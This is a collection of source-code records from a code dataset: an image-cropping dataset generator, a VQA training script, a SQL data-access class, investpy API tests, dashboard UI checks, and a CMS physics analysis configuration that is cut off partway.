+{"seq_id":"588314064","text":"import xml.etree.ElementTree as ET\nimport os\nimport csv\nfrom PIL import Image\nimport string\n\nCLASSES = string.digits + string.ascii_uppercase + string.ascii_lowercase\nrootdir='English'\ndataset_dir='kaist'\n\nif not os.path.isdir(dataset_dir):\n os.makedirs(dataset_dir)\n print(dataset_dir, 'genearted')\n\nimg_idx=0\nimg_names=[]\nimg_labels=[]\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n filepath = subdir + os.sep + file\n if filepath.endswith(\".xml\"):\n filename, file_extension = os.path.splitext(filepath)\n # print(filepath)\n try:\n tree = ET.parse(filepath)\n root = tree.getroot()\n except:\n\n print('xml error',filepath)\n continue\n\n for character in root.iter('character'):\n x=int(character.get('x'))\n y = int(character.get('y'))\n w = int(character.get('width'))\n h = int(character.get('height'))\n ch = character.get('char')\n if ch not in CLASSES:\n continue\n try:\n img = Image.open(filename+\".jpg\")\n except:\n img = Image.open(filename + \".JPG\")\n img.crop((x,y,x+w,y+h)).save(dataset_dir+'/img%d.png'%img_idx)\n img_names.append('img%d.png'%img_idx)\n img_idx+=1\n img_labels.append(ch)\n\n\n\nwith open( dataset_dir+'/'+dataset_dir+'.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerows(list(zip(img_names,img_labels)))\n print(dataset_dir+'/'+dataset_dir+'.csv','saved')","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"633366535","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# This is question answering model focusing on\n# dataset whose category is 'yes/no' question\n# such that it is binary classification\n#\n# This is written for running on NVIDIA Jetson so that\n# it will be not for tensorflow 2.0 but for 1.14\n# which is the latest version supported by NVIDIA\n\nimport os\nimport random\nimport time\nfrom functools import partial\nimport json\nimport warnings\n\n# ignore tensorflow debug info\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n# ignore numpy futre warnigns\nwarnings.filterwarnings('ignore')\n\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.python.keras.backend import set_session\n\nfrom keras_preprocessing import image\n\nfrom main.settings import Config\nfrom main.models import SequenceGeneratorModel, QuestionImageEncoder\nfrom main.models.train import make_training_seq_model\nfrom main.utils.preprocess import text_processor\n\nif tf.__version__ < '2.0.0':\n from main.metrics import calculate_accuracy_np as calculate_accuracy\n from main.utils.loader import load_image_simple as load_image\nelse:\n from main.metrics import calculate_accuracy\n from main.utils.loader import load_image\n\n\n# paramaters\nDEBUG = False\n\n# Train\nvocab_size = 20000\ndata_size = 100000\nseq_length = 15\nans_length = 5 + 2 # maximum answer length + '' and ''\n\nembedding_dim = 256\nunits = 512\n\nlearning_rate = 0.001\n\nbatch_size = 128\nepochs = 10\ndisplay_step = 1000\n\n# make easy to calculate accuracy and loss by average\nstep_per_val = 100\nval_size = batch_size * step_per_val\n\n\ndef data_generator(dataset, batch_size):\n steps_per_epoch = len(dataset) // batch_size\n\n for step in range(steps_per_epoch):\n start = step * batch_size\n batch = dataset[start:start+batch_size]\n qs, answers, imgs = data_process(batch)\n\n yield (qs, imgs), answers\n\n\n# Load data predprocessed\n# Format:\n# a list of dict:\n# keys = {'question', 'questionType', 'answer', 'answerType', 'image_path'}\ndef data_process(dataset):\n global processor\n global ans_processor\n\n qs = [d['question'] for d in dataset]\n qs = processor(qs)\n\n answers = [' ' + d['answer'] + ' ' for d in dataset]\n answers = ans_processor(answers)\n\n imgs = np.array([np.load(d['image_path'], allow_pickle=True)\n for d in dataset])\n return qs, answers, imgs\n\n\ndef main(train, val, *, save=False):\n if save:\n # threshold to save model weights\n min_loss = 50.0\n base_path = Config.MODELS.get('WHAT')\n enc_weights_path = os.path.join(base_path, 'encoder', 'weights')\n gen_weights_path = os.path.join(base_path, 'gen', 'weights')\n\n encoder = QuestionImageEncoder(units, vocab_size, embedding_dim)\n model = SequenceGeneratorModel(units,\n vocab_size,\n embedding_dim,\n encoder.embedding)\n\n optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n train_seq_step = make_training_seq_model(\n model,\n ans_length,\n optimizer,\n encoder_model=encoder,\n loss='sparse_categorical_crossentropy'\n )\n\n\n for epoch in range(1, epochs+1):\n epoch_start = time.time()\n print('=====' * 10)\n print(' Epochs:', epoch)\n print('=====' * 10)\n\n batch_start = time.time()\n\n random.shuffle(train)\n\n for batch, (inputs, labels) \\\n in enumerate(data_generator(train, batch_size=batch_size)):\n st = time.time()\n\n # ============================\n # Run model\n # ============================\n x = np.array([processor.word_index['']] * len(labels))\n loss, pred, attention_weights = train_seq_step(x, inputs, 
labels)\n\n if batch % display_step == 0:\n if DEBUG:\n print('[DEBUG] Batch:', batch)\n #print('[DEBUG] Average weights:')\n #for layer in model.layers:\n # print('Layer:', model.name + ':' + layer.name)\n # print(' weights:')\n # print(' mean:', np.mean(layer.get_weights()[0]))\n # print(' std: ', np.std(layer.get_weights()[0]))\n print('[DEBUG] Predicted Sentence:')\n print(' Input:', inputs[0][0])\n print(labels[0])\n print(' Label: {}'.format(\n ' '.join(ans_processor.index_word[idx]\n for idx in labels[0] if idx > 0)))\n # prediction does not have \n print(' Pred: {}'.format(\n ' ' + ' '.join(ans_processor.index_word[idx]\n for idx in pred[0] if idx > 0)))\n\n # general output\n curr_time = time.time()\n print(' Batch -', batch)\n print(f' Train: Loss - {loss:.4f} '\n f'Time(calc) - {curr_time-st:.4f}s/batch '\n f'Time(total) - {curr_time-batch_start:.4f}s/batch')\n\n batch_start = time.time()\n\n # after finished training in each epoch\n # evaluate model by validation dataset\n st_val = time.time()\n\n loss_val = 0\n predicts = []\n\n for in_val, l_val in data_generator(val, batch_size=batch_size):\n features, _ = encoder(*in_val)\n hidden = np.zeros((len(l_val), embedding_dim))\n batch_preds = []\n\n x = np.array([processor.word_index['']] * len(l_val))\n\n for i in range(1, ans_length):\n x, hidden, _ = model(x, in_val[0], features, hidden)\n cost = tf.keras.losses.sparse_categorical_crossentropy(\n labels[:, i], x,\n from_logits=True\n )\n x = tf.argmax(x, axis=-1)\n loss_val += tf.reduce_mean(cost)\n batch_preds.append(x)\n batch_preds = tf.stack(batch_preds, axis=1)\n predicts.append(batch_preds)\n\n loss_val /= len(predicts)\n end_val = time.time()\n\n print()\n print(' Validation: Loss - {:.4f} Time - {:.4f}s'.format(\n loss_val, end_val-st_val))\n print(' Total time per epoch: {:.4f}s'.format(\n time.time() - epoch_start))\n print()\n\n if save and loss_val < min_loss:\n min_loss = loss_val\n print('Saving model weights')\n encoder.save_weights(enc_weights_path)\n model.save_weights(gen_weights_path)\n print('Saved!')\n\n\nif __name__ == '__main__':\n from main.utils import make_parser\n parser = make_parser()\n\n args = parser.parse_args()\n\n DEBUG = args.debug\n\n if DEBUG:\n np.set_printoptions(precision=4)\n\n save = args.no_save\n\n st = time.time()\n print('Setting up dataset')\n with open('./data/answer_what.json', 'r') as f:\n dataset = json.load(f)\n\n print('Total loaded data size:', len(dataset))\n random.shuffle(dataset)\n\n train, val = dataset[:data_size], dataset[data_size: data_size+val_size]\n print('Data size: Train: {} Val: {}'.format(len(train), len(val)))\n\n # use all words from training set processed primarily\n processor = text_processor(maxlen=seq_length, from_config=True)\n ans_processor = text_processor(maxlen=ans_length, from_config=True)\n\n print('Time to setup: {:.4f}s'.format(time.time() - st))\n\n main(train, val, save=save)\n print('Training completed')\n print('Total running time: {:.4f}s'.format(time.time() - st))\n","sub_path":"old/run_what_answering_model.py","file_name":"run_what_answering_model.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"235442736","text":"from app.db.dao import DataAccessObject, DataObject\r\n\r\nfrom app.db.releases_dao import Release\r\nfrom app.db.correction_states_dao import CorrectionState\r\nfrom app.db.changenotes_dao import ChangeNoteFull\r\nfrom app.db.changenote_states_dao import ChangeNoteState\r\n\r\n\r\n\r\nclass Correction(DataObject):\r\n def __init__(self, row_id=None, uri=None, problem_report_id=None, release_id=None, correction_state_id=None, change_note_id=None):\r\n self.id = row_id\r\n self.uri = uri\r\n self.problem_report_id = problem_report_id\r\n self.release_id = release_id\r\n self.correction_state_id = correction_state_id\r\n self.change_note_id = change_note_id\r\n\r\n\r\nclass CorrectionFull(DataObject):\r\n def __init__(self, row_id=None, uri=None, problem_report_id=None, release=None, correction_sate=None, change_note=None):\r\n self.id = row_id\r\n self.uri = uri\r\n self.problem_report_id = problem_report_id\r\n self.release = release\r\n self.correction_state = correction_sate\r\n self.change_note = change_note\r\n\r\n def as_dict(self):\r\n dict = self.__dict__\r\n dict['release'] = self.release.__dict__\r\n dict['correction_state'] = self.correction_state.__dict__\r\n\r\n if self.change_note:\r\n dict['change_note'] = self.change_note.as_dict()\r\n\r\n return dict\r\n\r\n\r\nclass CorrectionDAO(DataAccessObject):\r\n def __init__(self, db_schema=None):\r\n DataAccessObject.__init__(self, 'correction', Correction, db_schema)\r\n\r\n def get_all_by_problem_report_ids(self, pr_id_list):\r\n\r\n if not pr_id_list:\r\n return None\r\n\r\n id_list = (\"{0}\").format( ','.join( str(v) for v in pr_id_list) )\r\n sql = \"\"\"\r\n SELECT `correction`.`id` AS corr_id,\r\n `correction`.`uri` AS corr_uri,\r\n `correction`.`problem_report_id` AS corr_problem_report_id,\r\n `release`.`id` AS rel_id,\r\n `release`.`release` AS rel_release,\r\n `correction_state`.`id` AS corrs_id,\r\n `correction_state`.`state` AS corrs_state,\r\n `change_note`.`id` AS cn_id,\r\n `change_note`.`title` AS cn_title,\r\n `change_note`.`uri` AS cn_uri,\r\n `change_note_state`.`id` AS cns_id,\r\n `change_note_state`.`state` AS cns_state\r\n FROM `correction`\r\n LEFT JOIN `release` ON `correction`.`release_id` = `release`.`id`\r\n LEFT JOIN `correction_state` ON `correction`.`correction_state_id` = `correction_state`.`id`\r\n LEFT JOIN `change_note` ON `correction`.`change_note_id` = `change_note`.`id`\r\n LEFT JOIN `change_note_state` ON `change_note`.`change_note_state_id` = `change_note_state`.`id`\r\n WHERE `problem_report_id` IN ({0})\r\n ORDER BY `problem_report_id`\r\n \"\"\".format( id_list )\r\n\r\n db_cursor = self._conn.execute(sql, None, cursorclass=self._conn.CURSORCLASS_DICTIONARY)\r\n\r\n return_obj_list = []\r\n\r\n row_data = db_cursor.fetchone()\r\n while row_data:\r\n return_obj_list.append( self._build_detailed_correction(row_data) )\r\n row_data = db_cursor.fetchone()\r\n\r\n db_cursor.close()\r\n\r\n return return_obj_list\r\n\r\n\r\n def _build_detailed_correction(self, row_data):\r\n corr = CorrectionFull()\r\n corr.id = row_data['corr_id']\r\n corr.uri = row_data['corr_uri']\r\n corr.problem_report_id = row_data['corr_problem_report_id']\r\n\r\n corr.release = Release( row_data['rel_id'],\r\n row_data['rel_release'] )\r\n\r\n corr.correction_state = CorrectionState( row_data['corrs_id'],\r\n row_data['corrs_state'] )\r\n\r\n cns = ChangeNoteState( row_data['cns_id'],\r\n row_data['cns_state'] )\r\n\r\n if row_data['cn_id']:\r\n corr.change_note = ChangeNoteFull( 
row_data['cn_id'],\r\n row_data['cn_title'],\r\n row_data['cn_uri'],\r\n cns)\r\n\r\n return corr\r\n\r\n","sub_path":"server/app/db/corrections_dao.py","file_name":"corrections_dao.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"182980885","text":"# Copyright 2018-2021 Alvaro Bartolome, alvarobartt @ GitHub\n# See LICENSE for details.\n\nimport pytest\n\nimport investpy\n\n\ndef test_investpy():\n \"\"\"\n This function checks that both the investpy's author and version are the correct ones.\n \"\"\"\n\n print(investpy.__author__)\n print(investpy.__version__)\n\n\ndef test_investpy_stocks():\n \"\"\"\n This function checks that stock data retrieval functions listed in investpy work properly.\n \"\"\"\n\n params = [\n {\n 'country': 'spain',\n },\n {\n 'country': None,\n },\n ]\n\n for param in params:\n investpy.get_stocks(country=param['country'])\n investpy.get_stocks_list(country=param['country'])\n\n params = [\n {\n 'country': None,\n 'columns': ['full_name', 'name'],\n 'as_json': True\n },\n {\n 'country': None,\n 'columns': ['full_name', 'name'],\n 'as_json': False\n },\n {\n 'country': 'spain',\n 'columns': ['full_name', 'name'],\n 'as_json': True\n },\n {\n 'country': 'spain',\n 'columns': ['full_name', 'name'],\n 'as_json': False\n },\n {\n 'country': 'spain',\n 'columns': None,\n 'as_json': False\n },\n ]\n\n for param in params:\n investpy.get_stocks_dict(country=param['country'],\n columns=param['columns'],\n as_json=param['as_json'])\n\n investpy.get_stock_countries()\n\n params = [\n {\n 'as_json': True,\n 'order': 'ascending',\n },\n {\n 'as_json': False,\n 'order': 'ascending',\n },\n {\n 'as_json': True,\n 'order': 'descending',\n },\n {\n 'as_json': False,\n 'order': 'descending',\n },\n ]\n\n for param in params:\n investpy.get_stock_recent_data(stock='BBVA',\n country='spain',\n as_json=param['as_json'],\n order=param['order'],\n interval='Daily')\n\n investpy.get_stock_historical_data(stock='BBVA',\n country='spain',\n from_date='01/01/1990',\n to_date='01/01/2019',\n as_json=param['as_json'],\n order=param['order'],\n interval='Daily')\n\n for value in ['spanish', 'english']:\n investpy.get_stock_company_profile(stock='BBVA',\n country='spain',\n language=value)\n\n params = [\n {\n 'stock': 'bbva',\n 'country': 'spain',\n 'as_json': False\n },\n {\n 'stock': 'bbva',\n 'country': 'spain',\n 'as_json': True\n },\n {\n 'stock': 'HSBK',\n 'country': 'kazakhstan',\n 'as_json': False\n }\n ]\n\n for param in params:\n investpy.get_stock_information(stock=param['stock'], country=param['country'], as_json=param['as_json'])\n\n params = [\n {\n 'country': 'spain',\n 'as_json': True,\n 'n_results': 50\n },\n {\n 'country': 'united states',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'bosnia',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'palestine',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'dubai',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'ivory coast',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'indonesia',\n 'as_json': False,\n 'n_results': 362\n }\n ]\n\n for param in params:\n investpy.get_stocks_overview(country=param['country'], as_json=param['as_json'], n_results=param['n_results'])\n\n params = [\n {\n 'stock': 'bbva',\n 'country': 'spain'\n },\n {\n 'stock': 'entel',\n 'country': 'chile'\n }\n ]\n\n for param in params:\n investpy.get_stock_dividends(stock=param['stock'], country=param['country'])\n\n params = [\n {\n 'stock': 'bbva',\n 'country': 'spain',\n 'summary_type': 'balance_sheet',\n 'period': 'annual'\n },\n {\n 'stock': 'aapl',\n 'country': 'united states',\n 'summary_type': 'income_statement',\n 'period': 'quarterly'\n },\n {\n 'stock': 'barc',\n 'country': 'united kingdom',\n 
'summary_type': 'cash_flow_statement',\n 'period': 'annual'\n }\n ]\n\n for param in params:\n investpy.get_stock_financial_summary(stock=param['stock'],\n country=param['country'], \n summary_type=param['summary_type'],\n period=param['period'])\n\n investpy.search_stocks(by='name', value='BBVA')\n\n\ndef test_investpy_currency_crosses():\n \"\"\"\n This function checks that currency cross data retrieval functions listed in investpy work properly.\n \"\"\"\n\n params = [\n {\n 'base': None,\n 'second': None,\n },\n {\n 'base': 'EUR',\n 'second': None,\n },\n {\n 'base': None,\n 'second': 'EUR',\n },\n {\n 'base': 'EUR',\n 'second': 'USD',\n },\n ]\n\n for param in params:\n investpy.get_currency_crosses(base=param['base'], second=param['second'])\n investpy.get_currency_crosses_list(base=param['base'], second=param['second'])\n\n params = [\n {\n 'base': None,\n 'second': None,\n 'columns': None,\n 'as_json': True\n },\n {\n 'base': None,\n 'second': None,\n 'columns': None,\n 'as_json': False\n },\n {\n 'base': 'EUR',\n 'second': None,\n 'columns': None,\n 'as_json': True\n },\n {\n 'base': 'EUR',\n 'second': None,\n 'columns': None,\n 'as_json': False\n },\n {\n 'base': None,\n 'second': 'USD',\n 'columns': None,\n 'as_json': True\n },\n {\n 'base': None,\n 'second': 'USD',\n 'columns': None,\n 'as_json': False\n },\n {\n 'base': 'EUR',\n 'second': 'USD',\n 'columns': None,\n 'as_json': True\n },\n {\n 'base': 'EUR',\n 'second': 'USD',\n 'columns': None,\n 'as_json': False\n },\n {\n 'base': 'EUR',\n 'second': 'USD',\n 'columns': ['name', 'full_name'],\n 'as_json': False\n },\n ]\n\n for param in params:\n investpy.get_currency_crosses_dict(base=param['base'],\n second=param['second'],\n columns=param['columns'],\n as_json=param['as_json'])\n\n investpy.get_available_currencies()\n\n params = [\n {\n 'currency_cross': 'EUR/USD',\n 'from_date': '01/01/2018',\n 'to_date': '01/01/2019',\n 'as_json': True,\n 'order': 'ascending',\n },\n {\n 'currency_cross': 'EUR/USD',\n 'from_date': '01/01/1990',\n 'to_date': '01/01/2019',\n 'as_json': False,\n 'order': 'descending',\n },\n {\n 'currency_cross': 'XAG/USD',\n 'from_date': '01/01/2010',\n 'to_date': '01/01/2015',\n 'as_json': False,\n 'order': 'descending',\n },\n {\n 'currency_cross': 'XAU/USD',\n 'from_date': '01/01/2010',\n 'to_date': '01/01/2015',\n 'as_json': False,\n 'order': 'descending',\n }\n ]\n\n for param in params:\n investpy.get_currency_cross_recent_data(currency_cross=param['currency_cross'],\n as_json=param['as_json'],\n order=param['order'],\n interval='Daily')\n\n investpy.get_currency_cross_historical_data(currency_cross=param['currency_cross'],\n from_date=param['from_date'],\n to_date=param['to_date'],\n as_json=param['as_json'],\n order=param['order'],\n interval='Daily')\n\n params = [\n {\n 'currency_cross': 'EUR/USD',\n 'as_json': False\n },\n {\n 'currency_cross': 'EUR/USD',\n 'as_json': True\n },\n {\n 'currency_cross': 'XAU/USD',\n 'as_json': True\n },\n {\n 'currency_cross': 'XAG/USD',\n 'as_json': True\n }\n ]\n\n for param in params:\n investpy.get_currency_cross_information(currency_cross=param['currency_cross'], as_json=param['as_json'])\n \n params = [\n {\n 'currency': 'try',\n 'as_json': False,\n 'n_results': 100\n },\n {\n 'currency': 'amd',\n 'as_json': True,\n 'n_results': 100\n }\n ]\n \n for param in params:\n investpy.get_currency_crosses_overview(currency=param['currency'], as_json=param['as_json'], n_results=param['n_results'])\n\n investpy.search_currency_crosses(by='base', value='EUR')\n\n\ndef 
test_investpy_search():\n \"\"\"\n This function checks that the investpy search function works properly.\n \"\"\"\n\n params = [\n {\n 'text': 'bbva',\n 'products': None,\n 'countries': None,\n 'n_results': 5\n },\n {\n 'text': 'spain 3y',\n 'products': None,\n 'countries': None,\n 'n_results': 5\n },\n {\n 'text': 'ibex 35',\n 'products': None,\n 'countries': None,\n 'n_results': 5\n },\n {\n 'text': 'bnp daxplus',\n 'products': None,\n 'countries': None,\n 'n_results': None\n },\n {\n 'text': 'apple',\n 'products': ['stocks'],\n 'countries': ['united states'],\n 'n_results': 1\n }\n ]\n\n for param in params:\n results = investpy.search_quotes(text=param['text'],\n products=param['products'],\n countries=param['countries'],\n n_results=param['n_results'])\n\n dates = [\n {\n 'from_date': '01/01/2018',\n 'to_date': '01/01/2019'\n },\n {\n 'from_date': '01/01/1990',\n 'to_date': '01/01/2019'\n },\n ]\n\n for result in results:\n print(result)\n result.retrieve_recent_data()\n for date in dates:\n result.retrieve_historical_data(from_date=date['from_date'], to_date=date['to_date'])\n break\n\n\ndef test_investpy_news():\n \"\"\"\n This function checks that investpy news retrieval functionality works as expected.\n \"\"\"\n\n params = [\n {\n 'time_zone': None,\n 'time_filter': 'time_only',\n 'countries': ['spain', 'france'],\n 'importances': ['high', 'low'],\n 'categories': ['credit', 'employment'],\n 'from_date': None,\n 'to_date': None\n },\n {\n 'time_zone': 'GMT -3:00',\n 'time_filter': 'time_only',\n 'countries': None,\n 'importances': None,\n 'categories': None,\n 'from_date': '01/01/2020',\n 'to_date': '01/02/2020'\n }\n ]\n\n for param in params:\n investpy.economic_calendar(time_zone=param['time_zone'],\n time_filter=param['time_filter'],\n countries=param['countries'],\n importances=param['importances'],\n categories=param['categories'],\n from_date=param['from_date'],\n to_date=param['to_date'])\n\n\ndef test_investpy_technical():\n \"\"\"\n This function checks that investpy technical indicators retrieval functionality works as expected.\n \"\"\"\n\n params = list()\n\n for interval in list(investpy.utils.constant.INTERVAL_FILTERS.keys()):\n params.append({\n 'name': 'bbva',\n 'country': 'spain',\n 'product_type': 'stock',\n 'interval': interval\n })\n\n for param in params:\n investpy.technical_indicators(name=param['name'],\n country=param['country'],\n product_type=param['product_type'],\n interval=param['interval'])\n\n investpy.moving_averages(name=param['name'],\n country=param['country'],\n product_type=param['product_type'],\n interval=param['interval'])\n\n investpy.pivot_points(name=param['name'],\n country=param['country'],\n product_type=param['product_type'],\n interval=param['interval'])\n\n\nif __name__ == '__main__':\n test_investpy()\n test_investpy_stocks()\n test_investpy_currency_crosses()\n test_investpy_search()\n test_investpy_news()\n test_investpy_technical()\n","sub_path":"tests/test_investpy.py","file_name":"test_investpy.py","file_ext":"py","file_size_in_byte":14686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"209310120","text":"import logging\nimport re\nfrom pages.dashboard_ui_page import DashboardUiPage\nfrom cases.helpers import CheckBase\n\n\nlog = logging.getLogger('bender')\n\n\nclass TestDashboardUi(CheckBase):\n\n page = None\n\n def set_page(self):\n self.page = DashboardUiPage(self._driver)\n\n def check_node_status(self):\n \"\"\"\n Purpose:\n Check node status in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info('Checking node status in virtualization dashboard...')\n try:\n # Check basic elements\n self.page.basic_check_elements_exists()\n except AssertionError as e:\n log.error(e)\n return False\n\n with self.page.switch_to_frame(self.page.frame_right_name): \n try:\n # Check current layer is correct\n test_layer = self._build + '+1'\n assert self.page.cur_layer_link.text == test_layer, \\\n \"Current layer is {}, not {}\".format(\n self.page.cur_layer_link.text, test_layer)\n\n # Check rollback button\n assert self.page.rollback_btn, \"Rollback button not exists\"\n except AssertionError as e:\n log.error(e)\n return False\n\n return True\n\n def check_vms_quantity(self):\n \"\"\"\n Purpose:\n Check the running Virtual Machines quantity in virtualization dashboard\n \"\"\"\n log.info(\"Check the running Virtual Machines quantity in virtualization dashboard\")\n\n with self.page.switch_to_frame(self.page.frame_right_name):\n # VM quantity is 0 where no vms are running\n try:\n assert re.search('0', self.page.vm_quantity.text), \\\n \"VM quantity is not 0\"\n except AssertionError as e:\n log.error(e)\n return False\n return True\n # Todo creating vm via rhvmapi\n\n def check_node_health(self):\n \"\"\"\n Purpose:\n Check node health in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Check node health in virtualization dashboard\")\n\n with self.page.switch_to_frame(self.page.frame_right_name):\n # click 'Health link'\n self.page.health_link.click()\n wev = self.page.wait_until_element_visible\n wev(self.page.node_health_dialog_title)\n\n # expand the node health dialog\n accordion_header_btn_list = list(self.page.health_dialog_btns)\n for i in accordion_header_btn_list[0:4]:\n i.click()\n self.page.wait(10)\n ok_number = len(list(self.page.ok_icons))\n try:\n assert ok_number == 16, \"OK number is {}, not 16\".format(ok_number)\n except AssertionError as e:\n log.error(e)\n return False\n finally:\n # Close dialog\n close_btn_list = list(self.page.close_btns)\n for j in close_btn_list[0:]:\n j.click()\n\n return True\n\n def check_node_info(self):\n \"\"\"\n Purpose:\n Check node information in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Check node information in virtualization dashboard\")\n ret = True\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.cur_layer_link.click()\n wev = self.page.wait_until_element_visible\n wev(self.page.cur_layer_dialog_title)\n self.page.wait(5)\n\n accordion_header_btn_list = list(self.page.layer_dialog_btns)\n for i in accordion_header_btn_list:\n i.click()\n self.page.wait(3)\n\n # Current layer should be identical with build layer\n test_layer = self._build + '+1'\n entry_txt_list = list(self.page.entry_txts)\n assert entry_txt_list[1].text == test_layer, \\\n \"Test layer fail\"\n\n # Since no update action on the new fresh installed\n # system, default layer is current layer\n assert entry_txt_list[0].text == entry_txt_list[1].text, \\\n \"Default is not current layer\"\n\n # Todo: check other info like kernel, initrd, etc\n except AssertionError as 
e:\n log.error(e)\n ret = False\n finally:\n close_btn_list = list(self.page.close_btns)\n for j in close_btn_list[0:]:\n j.click()\n return ret\n\n def check_network_page(self):\n \"\"\"\n Purpose:\n Go to the Networking page in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Go to the Networking page in virtualization dashboard\")\n\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.network_info_link.click()\n self.page.wait(3)\n assert re.search(r'network', self.page.current_url), \\\n \"Not directed to network page\"\n except AssertionError as e:\n log.error(e)\n return False\n return True\n\n def check_logs_page(self):\n \"\"\"\n Purpose:\n Go to the Logs page in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Go to the Logs page in virtualization dashboard\")\n\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.system_logs_link.click()\n self.page.wait(3)\n assert re.search(r'system/logs', self.page.current_url), \\\n \"Not directed to system logs page, as url is {}\".format(self.page.current_url)\n except AssertionError as e:\n log.error(e)\n return False\n return True\n\n def check_storage_page(self):\n \"\"\"\n Purpose:\n Go to the Storage page in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Go to the Storage page in virtualization dashboard\")\n\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.storage_link.click()\n self.page.wait(3)\n assert re.search(r'storage', self.page.current_url), \\\n \"Not directed to storage page\"\n except AssertionError as e:\n log.error(e)\n return False\n return True\n\n def check_ssh_key(self):\n \"\"\"\n Purpose:\n Check the ssh host key in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Check the ssh host key in virtualization dashboard\")\n\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.ssh_key_link.click()\n self.page.wait(3)\n assert self.page.ssh_key_dialog_title, \\\n \"SSH key error\"\n except AssertionError as e:\n log.error(e)\n return False\n return True\n","sub_path":"cases/checks/test_dashboard_ui.py","file_name":"test_dashboard_ui.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"431032334","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process('Tau3MuSkim')\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.load(\"TrackingTools/TransientTrack/TransientTrackBuilder_cfi\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nprocess.load(\"TrackingTools.TransientTrack.TransientTrackBuilder_cfi\")\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load(\"SkimTools.SkimTrigger.Tau3MuTriggerSkimAOD_cff\")\n\n#process.GlobalTag.globaltag = '94X_mc2017_realistic_v14'\nprocess.GlobalTag.globaltag = '102X_upgrade2018_realistic_v20' #\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n #'root://xrootd-cms.infn.it//store/user/bjoshi/BuTau3Mu/CRAB3_MC2018_BuTau3Mu_13TeV_DIGI/191212_193400/0000/BuTau3Mu_2018MC_106.root',\n 'root://xrootd-cms.infn.it//store/user/wangjian/DsToTau_TauTo3Mu/CRAB3_RunIIAutumn18DR_AODSIM/191120_085131/0000/TSG-RunIIAutumn18DR-00006_99.root',\n # 'root://xrootd-cms.infn.it//store/mc/RunIIFall17DRPremix/DsToTau_To3Mu_MuFilter_TuneCUEP8M1_13TeV-pythia8/AODSIM/PU2017_94X_mc2017_realistic_v11-v1/70000/FA2225BE-7549-E911-ADE0-3417EBE64BE8.root', \n #'root://xrootd-cms.infn.it//store/data/Run2018A/DoubleMuonLowMass/AOD/17Sep2018-v1/120000/3C6EECC5-5787-AC43-ACF0-3BE40CE1291C.root',\n #root://xrootd-cms.infn.it//store/data/Run2017F/DoubleMuonLowMass/AOD/09May2018-v1/80000/AECC4C56-BAB0-E811-B92A-008CFA1979AC.root'\n #\"file:/lustrehome/venditti/TestMiniAOD2017/CMSSW_9_4_4/src/CrabSubmission/MC/PiGun_RECO.root\"\n #\"file:/lustre/cms/store/user/rosma/PionGun_Pt0to30GeV/PiGun_13TeV_MC2017_RECO/190313_143541/0000/PiGun_RECO_979.root\"\n #'file:/lustre/cms/store/user/fsimone/DsTau3Mu/crab_crab_DsTau3Mu__13TeV_MC2016_RECO/190120_140919/0001/custom_DsTau3Mu_13TeV_RECO_crab350_1010.root',\n\n\n )\n)\n\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string(\"Tree_trg.root\"))\n\n\nprocess.TreeMakerBkg = cms.EDAnalyzer(\"TriggerAnalysisT3M\",\n isMcLabel = cms.untracked.bool(True),\n isAnaLabel = cms.untracked.bool(True),\n muonLabel=cms.InputTag(\"looseMuons\"),\n #VertexLabel=cms.InputTag(\"offlinePrimaryVerticesWithBS\"),\n VertexLabel=cms.InputTag(\"offlinePrimaryVertices\"),\n genParticleLabel=cms.InputTag(\"genParticles\"),\n pileupSummary = cms.InputTag(\"addPileupInfo\"),\n Cand3MuLabel=cms.InputTag(\"ThreeMuonsVtxKalmanFit\"),\n triggerResults = 